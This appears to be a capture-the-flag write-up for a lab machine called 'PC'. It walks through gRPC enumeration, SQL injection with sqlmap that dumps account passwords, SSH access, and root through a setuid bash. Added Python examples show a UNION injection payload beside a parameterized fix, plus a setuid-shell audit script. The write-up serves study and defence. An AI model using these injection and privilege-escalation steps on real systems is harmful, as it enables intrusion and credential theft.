PC
1. Initial recon
1.1. nmap
```
nmap -p- 10.10.11.214 -Pn
PORT      STATE SERVICE
22/tcp    open  ssh
50051/tcp open  unknown
```
2. user.txt
2.1. gRPC
A Google search for port 50051 reveals that this port is generally used for gRPC.
Following this blog post I can start to find out how to enumerate gRPC.
Using grpcurl we can see that there is a service called SimpleApp running:
```
./grpcurl --plaintext 10.10.11.214:50051 list
SimpleApp
grpc.reflection.v1alpha.ServerReflection
```
and that the service exposes three RPC methods:
```
./grpcurl --plaintext 10.10.11.214:50051 list SimpleApp
SimpleApp.LoginUser
SimpleApp.RegisterUser
SimpleApp.getInfo
```
Now let's use grpcui to get a web UI for the application:
```
./grpcui -plaintext 10.10.11.214:50051
gRPC Web UI available at http://127.0.0.1:36185/
```
If we try to call getInfo we get the following output:
```
{
"message": "Authorization Error.Missing 'token' header"
}
```
So we may need to use RegisterUser and then LoginUser to get a token.
If we try to register a user with the name admin we get an error saying that the user already exists; however, the credentials admin:admin work with the LoginUser function and generate a token. Taking note of the id and token we are given, let's use them with the getInfo function and see what we get:
```
{
"message": "Will update soon."
}
```
Let's try some other numbers, like 1:
```
Unexpected <class 'TypeError'>: 'NoneType' object is not subscriptable
```
Time to do some research.
2.2. SQLmap
This Medium article talks about how SQLi might be a vulnerability when dealing with gRPC, so let's capture a request to the getInfo function using Burp Suite and see if sqlmap can do anything for us.
```
sqlmap -r req.txt -dbs --batch
[INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[WARNING] on SQLite it is not possible to enumerate databases (use only '--tables')
```
```
sqlmap -r req.txt --tables --batch
[INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[INFO] fetching tables for database: 'SQLite_masterdb'
<current>
[2 tables]
+----------+
| accounts |
| messages |
+----------+
```
```
sqlmap -r req.txt -T accounts --batch --dump
Table: accounts
[2 entries]
+------------------------+----------+
| password               | username |
+------------------------+----------+
| admin                  | admin    |
| HereIsYourPassWord1431 | sau      |
+------------------------+----------+
```
We can use the credentials sau:HereIsYourPassWord1431 to SSH into the machine and read the user flag.
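The SimpleApp server code is not on the page, so the following is an added example (not the box's source) that reconstructs the two symptoms seen above in a hypothetical getInfo handler: the id is spliced into the SQL string (which is why sqlmap could dump the accounts table), and the result row is indexed without a None check (which is where the leaked TypeError comes from). The hardened version beside it validates the id, binds it as a parameter and handles the no-row case. The in-memory database, the `sau` password and the handler names are constructed for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the box's SQLite database.

    The table names match what sqlmap listed; the rows are sample data,
    not the real contents.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE accounts (username TEXT, password TEXT);
        CREATE TABLE messages (id INTEGER, message TEXT);
        INSERT INTO accounts VALUES ('admin', 'admin');
        INSERT INTO accounts VALUES ('sau', 'constructed-password');
        INSERT INTO messages VALUES (1, 'Will update soon.');
        """
    )
    return conn


def get_info_vulnerable(conn: sqlite3.Connection, user_id: str) -> dict:
    """Hypothetical reconstruction of the flawed getInfo handler.

    The id from the request is spliced straight into the SQL text, and the
    result row is indexed without checking for None.
    """
    query = f"SELECT message FROM messages WHERE id = '{user_id}'"
    row = conn.execute(query).fetchone()
    return {"message": row[0]}  # row is None for an unknown id -> TypeError


def get_info_fixed(conn: sqlite3.Connection, user_id: str) -> dict:
    """Hardened handler: validate the id, bind it as a parameter, handle no-row."""
    if not user_id.isdigit():
        return {"message": "Invalid id."}
    row = conn.execute(
        "SELECT message FROM messages WHERE id = ?", (int(user_id),)
    ).fetchone()
    if row is None:
        return {"message": "No such id."}
    return {"message": row[0]}


def call(handler, user_id: str) -> dict:
    """Run a handler against a fresh database, reporting an uncaught exception
    by class name, the way the server on the page leaks it."""
    try:
        return handler(make_db(), user_id)
    except Exception as exc:  # broad on purpose: we want to show the leak
        return {"error": type(exc).__name__}


# Classic UNION injection: closes the quoted id and appends a second SELECT.
UNION_PAYLOAD = "' UNION SELECT password FROM accounts WHERE username='sau"

if __name__ == "__main__":
    for uid in ["1", "2", UNION_PAYLOAD]:
        print(repr(uid))
        print("  vulnerable:", call(get_info_vulnerable, uid))
        print("  fixed:     ", call(get_info_fixed, uid))
```

Running it shows the vulnerable handler returning the other account's password for the UNION payload and raising TypeError for an unknown id, while the fixed handler returns a plain error message for both; the parameter binding is what closes the injection, and the explicit None check is what stops the stack trace from reaching the client.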
3. root.txt
Running a command to check for SUID binaries:
```
find / -type f -perm -04000 -ls 2>/dev/null
```
we can see that bash is in the list, so simply run
```
/usr/bin/bash -p
```
for root!
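From the defender's side, the misconfiguration above is easy to audit for on a schedule. The following is an added example (not part of the original writeup) that does the same walk as the `find` command in Python, flags any setuid file whose name is a shell, and strips the bit as remediation. The `make_fixture` tree with a fake setuid `bash` is constructed for the example; the shell-name list is an assumption about what counts as a shell.

```python
import os
import stat
import tempfile

# Shells and shell-like interpreters: setuid on any of these hands out a
# root shell (bash needs -p so it keeps the effective uid).
SHELL_NAMES = {"bash", "sh", "dash", "zsh", "ksh", "fish"}


def find_setuid(root: str) -> list:
    """Return every regular file under `root` with the setuid bit set.

    Equivalent to `find ROOT -type f -perm -04000`; unreadable paths are skipped.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def setuid_shells(paths) -> list:
    """Filter setuid files down to the ones that are shells."""
    return [p for p in paths if os.path.basename(p) in SHELL_NAMES]


def strip_setuid(path: str) -> int:
    """Remediation: clear the setuid bit and return the resulting mode bits."""
    mode = stat.S_IMODE(os.lstat(path).st_mode)
    os.chmod(path, mode & ~stat.S_ISUID)
    return stat.S_IMODE(os.lstat(path).st_mode)


def audit(root: str) -> dict:
    found = find_setuid(root)
    return {"setuid": found, "setuid_shells": setuid_shells(found)}


def make_fixture() -> str:
    """Constructed test tree: a setuid 'bash' and a plain 'cat' (placeholder
    script files, not real binaries), so the audit can be exercised offline."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("bash", 0o4755), ("cat", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root


def run_fixture_audit() -> dict:
    """Audit the fixture, remediate the flagged shells, audit again.

    Paths are returned relative to the fixture root so the result is stable."""
    root = make_fixture()

    def rel(paths):
        return [os.path.relpath(p, root) for p in paths]

    before = audit(root)
    for path in before["setuid_shells"]:
        strip_setuid(path)
    return {
        "setuid": rel(before["setuid"]),
        "setuid_shells": rel(before["setuid_shells"]),
        "after_fix": rel(audit(root)["setuid"]),
    }


if __name__ == "__main__":
    import json
    # Real run: walk the whole filesystem (needs time; unreadable dirs are skipped).
    print(json.dumps(audit("/"), indent=2))
```

On a real host, compare the `setuid` list against the distribution's package manifests and alert on anything outside it; a setuid shell should never be on the list at all.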